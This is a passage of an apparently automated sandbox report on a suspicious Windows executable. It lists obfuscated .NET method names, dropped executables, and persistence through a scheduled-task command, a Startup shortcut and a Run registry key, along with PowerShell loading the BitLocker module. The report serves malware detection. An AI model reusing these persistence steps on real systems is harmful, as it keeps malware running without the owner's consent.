              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, X0CI17Nm2rK9soP4pW.csHigh entropy of concatenated method names: 'Dispose', 'lhKMfkGvBZ', 'wLZ4Yb88y8', 'c4VIJQdyrP', 'PTSMHyJ0i3', 'L9GMzXgcPq', 'ProcessDialogKey', 'lKv4L5r4yM', 'YRg4MaMpV6', 'c2a44F6kQq'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, IrSCmVMMhSAxy1sNwDY.csHigh entropy of concatenated method names: 'XxkoHW3QiY', 'U83ozFLryS', 'bFmjLKjL4X', 'kyBjMBjEty', 'DK9j4WDA5V', 'U4HjwOMsdE', 'itFjRC0vK1', 'GtEjaYOSkx', 'eQAjm6S772', 'NOtjNL9pKk'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, dWu4X2POSeE0PxkDow.csHigh entropy of concatenated method names: 'oD7NZBVV0S', 'AIWNWaldgO', 'qxkNFG9puw', 'fKgNDwWWJe', 'GLnN53mHdT', 'bW3NEP3ZyU', 'Q5tNyyPOWv', 'bpkNJAOnHj', 'LkxNfk38fL', 'BplNHAFPNF'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, S6kQq8H2YIZ3L9W7Iu.csHigh entropy of concatenated method names: 'tMho7YfbJ6', 'r6Goq8Adjx', 'nHZornjoec', 'pH3okUIbbd', 'rENot4OdO8', 'rHmoBKKgIR', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, A0S6FhlAu3ak4X5Hn3.csHigh entropy of concatenated method names: 'htt7IrJ3mw', 'B4s7K7lYDA', 'GOZ7PChdSj', 'Pdd7lCHrkH', 'udF7bJwLu9', 'sKk7nvupqW', 'pPJ7ecpFw1', 't1B7sOKSjM', 'r8P7t6D93Y', 'jGN7oi2djJ'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, DxVbSFEWu8YfBsCZIJ.csHigh entropy of concatenated method names: 'zoreJ9PuIV', 'rmweHajdJ2', 'icvsL2Ur4Q', 'JPbsM7QQEW', 'zUpeUjA7hS', 'Fahe1RdUB1', 'Ulue0lKtKh', 'TTseZXqNkm', 'AN0eW4FqNq', 'KM8eFJjY8k'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, l5r4yMfHRgaMpV6w2a.csHigh entropy of concatenated method names: 'VEdtxa5GFe', 'NuytYIbGuT', 'aXQtiuMxof', 'apntp4Rte9', 'UPvt9U26ia', 'XLqtciOh64', 'XnstOf9FPd', 'gKnt3hCetx', 'ii7tgosKho', 'znPtTuWFgo'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, cgS87n0bF9R7j9LBfg.csHigh entropy of concatenated method names: 'SkhVPu7f6k', 'g2iVlqVO2N', 'f4QVxFNQtO', 'UjdVYeXU67', 'WcEVp5uVer', 'xxxV9H1SA7', 'M7xVOJhJWj', 'bfMV3jTF4e', 'RsdVTId25Q', 'KW6VUWDu6S'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, RNpgfFMRE75cxe1a9ye.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8G2tr4KtS', 'AcX2oKYvAT', 'qnm2jRyMOv', 'oXH22sGkqe', 'IVd2GdxjUM', 'OwZ2Xax3wU', 'dpf2hbA0kp'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, KhXskcgjJb7WhBNB0e.csHigh entropy of concatenated method names: 'yWEkCYqyrk', 'RUokS7Qv7W', 'XCIk6se4hQ', 'vSZkIi8q9t', 'ef6kd1LsIb', 'UcPkKiZpLo', 'O67k8UvCQR', 'NlGkPfLSnO', 'pG6klcfFWj', 'aTPkAeRCHR'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, Ai0pUZOnQWs6p8kWrU.csHigh entropy of concatenated method names: 'lXKkmhsAiC', 'xQvk7l1Ah7', 'uFvkrNBmvv', 'b60rH8fCuL', 'VcQrzARj3C', 'HRskLtRtXG', 'H3GkMXNjkK', 'kUEk41gDxi', 'F0dkwcEmO6', 'rZNkRhq6NB'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, lMrCMlzm8JgcqZan6j.csHigh entropy of concatenated method names: 'cA5oKnDeou', 'PWooPwXbF5', 'dpEolbbYJD', 'eLBoxlVPbE', 'BbIoYe9T5H', 'eWKopNAMS7', 'ft4o9T9e53', 'CeYohkSvPY', 'rPgoCNIZ9N', 'OoGoSdCcI7'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, tP4sQN4ycAfk4RTrPD.csHigh entropy of concatenated method names: 'ptb625Gys', 'msnI2FQDZ', 'xFPKxJB28', 'CJq8FeOMM', 'DRNlYykf4', 'MFsAxwA8F', 'VHwMsZn5qaRXoBVEAV', 'QUFS8Ijmg4nd478XUT', 'gxVsjeR3b', 'CWIomyXBC'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, EukKZG7BIlra3Zvh4J.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Tfb4fAm9st', 'fPH4HUvKcM', 'vt94zanV1I', 'p0KwLhOU8h', 'AWPwMyQ1hF', 'L4uw4rOZVE', 'jorwwc8JUv', 'EFC9ymNLxT8fLITSHdI'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, bdaIPTyqCvhKkGvBZ0.csHigh entropy of concatenated method names: 'JVZtbeyfo8', 'fLHteXo97w', 'CkCttC4os1', 'L0etj9c8VZ', 'EogtGiHXPO', 'vijthM8355', 'Dispose', 'kLXsm2ZIfW', 'JrlsNQWJaE', 'j7ls7ZXlOp'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, B2X6TIA6OwcjisGogX.csHigh entropy of concatenated method names: 'k2QqdjfgZ5', 'eLeq8Ftpnh', 'Jw97ikoIAC', 'i987pfwYMZ', 'vxu79ThvK9', 'bMJ7cynblv', 'K9d7OmOdpm', 'dmP73StVmr', 'XQc7g9wnpc', 'cIn7T1XoCF'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, JPU6JeZEfcOAh3VAxw.csHigh entropy of concatenated method names: 'FMgbTXjbCK', 'uqZb1Vs1nh', 'SuDbZAuWsr', 'cfrbWkUplv', 'crYbYVOVeH', 'PdCbi5XQT8', 'qiEbpGCZsq', 'Etyb9QT1qs', 'XwNbc3fkbI', 'z89bOi6iXU'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, BfRKGsxfmapLDnyJae.csHigh entropy of concatenated method names: 'MbSrafQdhs', 'WNYrNlajD9', 'JMUrqANN1W', 'OF1rkrPrwn', 'cGBrBHtKk2', 'CoYq58XgrI', 'aAnqEuqaSf', 'YQHqy03gBN', 'oC6qJSqequ', 'grPqfIOBvQ'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.csHigh entropy of concatenated method names: 'KqpwaCvyRb', 'GdUwmRTqhL', 'sPIwNeNjTg', 'e7Zw75gqvZ', 'fONwq8WGVq', 'XRRwraVqAf', 'uILwk3RPMY', 'c0qwBpt8qH', 'cMewQjfnRs', 'jTvwvXj1jG'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, G0rrHkR3Regm38HbYK.csHigh entropy of concatenated method names: 'hmRMkWu4X2', 'LSeMBE0Pxk', 'wAuMv3ak4X', 'UHnMu3d2X6', 'rGoMbgXKfR', 'BGsMnfmapL', 'RM4Zsa9v91jxrp3tyN', 'hy62Gm5BFHIFjtfOWS', 'DUNMMAYQlq', 'UXKMwmR6U4'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, etnqG0M40RuYQ2CGjgs.csHigh entropy of concatenated method names: 'ToString', 'pYyjPN0WPl', 'Fn4jl9uRBK', 'H9njAaFHsF', 'ir7jx6YOxy', 'tPkjYgC6i8', 'LgXjiJGs3G', 'oPYjpUIa4S', 'X1FpvL0waeBwGC0jlB7', 'H9FsVx0GUf3cpEH2BN3'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, X0CI17Nm2rK9soP4pW.csHigh entropy of concatenated method names: 'Dispose', 'lhKMfkGvBZ', 'wLZ4Yb88y8', 'c4VIJQdyrP', 'PTSMHyJ0i3', 'L9GMzXgcPq', 'ProcessDialogKey', 'lKv4L5r4yM', 'YRg4MaMpV6', 'c2a44F6kQq'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, IrSCmVMMhSAxy1sNwDY.csHigh entropy of concatenated method names: 'XxkoHW3QiY', 'U83ozFLryS', 'bFmjLKjL4X', 'kyBjMBjEty', 'DK9j4WDA5V', 'U4HjwOMsdE', 'itFjRC0vK1', 'GtEjaYOSkx', 'eQAjm6S772', 'NOtjNL9pKk'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, dWu4X2POSeE0PxkDow.csHigh entropy of concatenated method names: 'oD7NZBVV0S', 'AIWNWaldgO', 'qxkNFG9puw', 'fKgNDwWWJe', 'GLnN53mHdT', 'bW3NEP3ZyU', 'Q5tNyyPOWv', 'bpkNJAOnHj', 'LkxNfk38fL', 'BplNHAFPNF'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, S6kQq8H2YIZ3L9W7Iu.csHigh entropy of concatenated method names: 'tMho7YfbJ6', 'r6Goq8Adjx', 'nHZornjoec', 'pH3okUIbbd', 'rENot4OdO8', 'rHmoBKKgIR', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, A0S6FhlAu3ak4X5Hn3.csHigh entropy of concatenated method names: 'htt7IrJ3mw', 'B4s7K7lYDA', 'GOZ7PChdSj', 'Pdd7lCHrkH', 'udF7bJwLu9', 'sKk7nvupqW', 'pPJ7ecpFw1', 't1B7sOKSjM', 'r8P7t6D93Y', 'jGN7oi2djJ'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, DxVbSFEWu8YfBsCZIJ.csHigh entropy of concatenated method names: 'zoreJ9PuIV', 'rmweHajdJ2', 'icvsL2Ur4Q', 'JPbsM7QQEW', 'zUpeUjA7hS', 'Fahe1RdUB1', 'Ulue0lKtKh', 'TTseZXqNkm', 'AN0eW4FqNq', 'KM8eFJjY8k'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, l5r4yMfHRgaMpV6w2a.csHigh entropy of concatenated method names: 'VEdtxa5GFe', 'NuytYIbGuT', 'aXQtiuMxof', 'apntp4Rte9', 'UPvt9U26ia', 'XLqtciOh64', 'XnstOf9FPd', 'gKnt3hCetx', 'ii7tgosKho', 'znPtTuWFgo'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, cgS87n0bF9R7j9LBfg.csHigh entropy of concatenated method names: 'SkhVPu7f6k', 'g2iVlqVO2N', 'f4QVxFNQtO', 'UjdVYeXU67', 'WcEVp5uVer', 'xxxV9H1SA7', 'M7xVOJhJWj', 'bfMV3jTF4e', 'RsdVTId25Q', 'KW6VUWDu6S'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, RNpgfFMRE75cxe1a9ye.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8G2tr4KtS', 'AcX2oKYvAT', 'qnm2jRyMOv', 'oXH22sGkqe', 'IVd2GdxjUM', 'OwZ2Xax3wU', 'dpf2hbA0kp'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, KhXskcgjJb7WhBNB0e.csHigh entropy of concatenated method names: 'yWEkCYqyrk', 'RUokS7Qv7W', 'XCIk6se4hQ', 'vSZkIi8q9t', 'ef6kd1LsIb', 'UcPkKiZpLo', 'O67k8UvCQR', 'NlGkPfLSnO', 'pG6klcfFWj', 'aTPkAeRCHR'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, Ai0pUZOnQWs6p8kWrU.csHigh entropy of concatenated method names: 'lXKkmhsAiC', 'xQvk7l1Ah7', 'uFvkrNBmvv', 'b60rH8fCuL', 'VcQrzARj3C', 'HRskLtRtXG', 'H3GkMXNjkK', 'kUEk41gDxi', 'F0dkwcEmO6', 'rZNkRhq6NB'
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeJump to dropped file
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnkJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnkJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9758xBqgE1azKnBJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9758xBqgE1azKnBJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
